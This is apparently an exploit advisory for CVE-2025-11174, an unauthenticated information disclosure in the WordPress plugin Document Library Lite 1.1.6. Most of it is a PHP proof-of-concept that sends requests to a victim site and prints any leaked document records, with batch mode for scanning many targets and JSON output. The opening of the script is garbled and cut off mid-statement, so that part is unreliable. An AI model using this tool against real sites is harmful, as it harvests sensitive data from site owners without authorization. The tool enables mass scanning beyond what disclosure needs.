============================================================================================================================================= | # Title : WordPress Document Library Lite 1.1.6 Information Disclosure | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://wordpress.org/plugins/document-library-lite/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211137/ & CVE-2025-11174 [+] Summary : The WordPress plugin “Document Library Lite” fails to restrict access to internal AJAX API endpoint allowing unauthenticated attackers to fetch document records exposing sensitive metadata. [+] POC : * Usage: php poc.php https://victim.com php poc.php https://victim.com output.json $u, CURLOPT_POST=>true, CURLOPT_POSTFIELDS=>$p, CURLOPT_HTTPHEADER=>$h, CURLOPT_RETURNTRANSFER=>true, CURLOPT_TIMEOUT=>10, CURLOPT_FOLLOWLOCATION=>true, CURLOPT_SSL_VERIFYPEER=>false ]); $r=curl_exec($c); $s=curl_getinfo($c,CURLINFO_HTTP_CODE); $e=curl_error($c); curl_close($c); echo Colors::G."[+] HTTP: ".Colors::N.$s.PHP_EOL.PHP_EOL; if($e){ echo Colors::R."[!] CURL ERROR: $e".Colors::N.PHP_EOL; return ["vuln"=>false]; } if($s!=200){ echo Colors::Y."[!] Unexpected status".Colors::N.PHP_EOL; return ["vuln"=>false]; } $j=json_decode($r,true); if(json_last_error()!==JSON_ERROR_NONE){ echo Colors::G."[+] No JSON returned — not vulnerable".Colors::N.PHP_EOL; return ["vuln"=>false]; } if(isset($j["data"]) || isset($j["recordsTotal"])){ echo Colors::R."[!!!] 
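VULNERABLE".Colors::N.PHP_EOL.PHP_EOL; echo Colors::G."[+] Retrieved Data:".Colors::N.PHP_EOL; echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL; return ["vuln"=>true,"data"=>$j]; } echo Colors::G."[+] Not vulnerable".Colors::N.PHP_EOL; if($v){ echo Colors::Y."[Verbose] Data:".Colors::N.PHP_EOL; echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL; } return ["vuln"=>false,"data"=>$j]; }

/**
 * Whether the pcntl extension's signal helpers are available. The extension
 * is optional (and absent on Windows builds), so the SIGINT handler at the
 * bottom of the file is installed only when this returns true.
 *
 * @return bool
 */
function isPCNTL() {
    return function_exists("pcntl_signal") && function_exists("pcntl_async_signals");
}

/**
 * Pick the target out of the raw argument list ($argv without the script
 * name): the first argument that is neither an option nor the value that
 * belongs to -o/--output.
 *
 * The previous scan took the first argument not starting with "-", so
 * `-o out.json https://host` selected "out.json" as the target; the
 * option's value is now skipped. Empty arguments are ignored too (indexing
 * $a[0] on "" emits a warning on PHP 8).
 *
 * @param string[] $args
 * @return string|null  null when no positional argument is present
 */
function findTarget(array $args) {
    $count = count($args);
    for ($i = 0; $i < $count; $i++) {
        $a = $args[$i];
        if ($a === '-o' || $a === '--output') {
            $i++;                       // skip the option's value
            continue;
        }
        if ($a === '' || $a[0] === '-') {
            continue;                   // empty, or an option flag/-ofile/--output=file
        }
        return $a;
    }
    return null;
}

/**
 * Read one target per line from $file (blank lines dropped).
 *
 * Exits with status 1 when the file is missing or cannot be read, instead
 * of letting file() return false and count() fail on it.
 *
 * @param string $file
 * @return string[]
 */
function loadTargets($file) {
    if (!file_exists($file)) {
        echo Colors::R."[!] ERROR: Batch file not found: $file".Colors::N.PHP_EOL;
        exit(1);
    }
    $list = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($list === false) {
        echo Colors::R."[!] ERROR: Batch file not readable: $file".Colors::N.PHP_EOL;
        exit(1);
    }
    return $list;
}

/**
 * Write $data as pretty-printed JSON to $path and report the outcome.
 *
 * getopt() returns an array when the same option is repeated, so the last
 * value given wins; a failed write is reported rather than ignored.
 *
 * @param string|string[] $path  value of -o/--output
 * @param mixed           $data  result(s) to serialise
 * @return void
 */
function saveResults($path, $data) {
    if (is_array($path)) {
        $path = end($path);
    }
    $written = file_put_contents($path, json_encode($data, JSON_PRETTY_PRINT));
    if ($written === false) {
        echo Colors::R."[!] ERROR: Could not write: $path".Colors::N.PHP_EOL;
        return;
    }
    echo Colors::G."[+] Saved to: $path".Colors::N.PHP_EOL;
}

/**
 * Command-line entry point.
 *
 * Options must precede TARGET, because getopt() stops parsing at the first
 * non-option argument:
 *   -v, --verbose    print the decoded response even when not flagged vulnerable
 *   -h, --help       print usage and exit
 *   -o, --output F   save the result(s) as JSON to file F
 *   --batch          treat TARGET as a file holding one target per line
 *   --no-banner      suppress the banner
 *
 * A bare trailing filename after TARGET (as in the usage example at the top
 * of this file) is not an output option; only -o/--output writes a file.
 *
 * Exit status: 0 when the single target is reported vulnerable, 1 otherwise;
 * batch mode exits 0 after every listed target has been tested.
 *
 * @return void
 */
function main() {
    global $argv;
    $opts = getopt("vho:", ["verbose", "help", "output:", "batch", "no-banner"]);

    if (!isset($opts["no-banner"])) {
        banner();
    }
    if (isset($opts["h"]) || isset($opts["help"])) {
        echo "Usage: php ".basename($argv[0])." [OPTIONS] TARGET\n\n";
        exit;
    }
    $verbose = isset($opts["v"]) || isset($opts["verbose"]);

    $target = findTarget(array_slice($argv, 1));
    if ($target === null || $target === '') {
        echo Colors::R."[!] ERROR: No Target Provided".Colors::N.PHP_EOL;
        exit(1);
    }

    $wantSave = isset($opts["o"]) || isset($opts["output"]);
    $outPath  = $opts["o"] ?? $opts["output"] ?? null;

    if (isset($opts["batch"])) {
        $list = loadTargets($target);   // exits on a missing/unreadable file
        echo Colors::G."[+] Loaded ".count($list)." targets".Colors::N.PHP_EOL.PHP_EOL;
        $res = [];
        foreach ($list as $x) {
            echo Colors::C."[~] Testing $x".Colors::N.PHP_EOL;
            $r = poc($x, $verbose);
            $r["target"] = $x;
            $res[] = $r;
            echo PHP_EOL;
        }
        if ($wantSave) {
            saveResults($outPath, $res);
        }
        exit;
    }

    $r = poc($target, $verbose);
    if ($wantSave) {
        saveResults($outPath, $r);
    }
    exit($r["vuln"] ? 0 : 1);
}

// Install a SIGINT handler only where pcntl exists; elsewhere Ctrl-C simply
// terminates the process with PHP's default behaviour.
if (isPCNTL()) {
    pcntl_async_signals(true);
    pcntl_signal(SIGINT, function () {
        echo PHP_EOL.Colors::Y."[!] Interrupted".Colors::N.PHP_EOL;
        exit(130);
    });
}
main();
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================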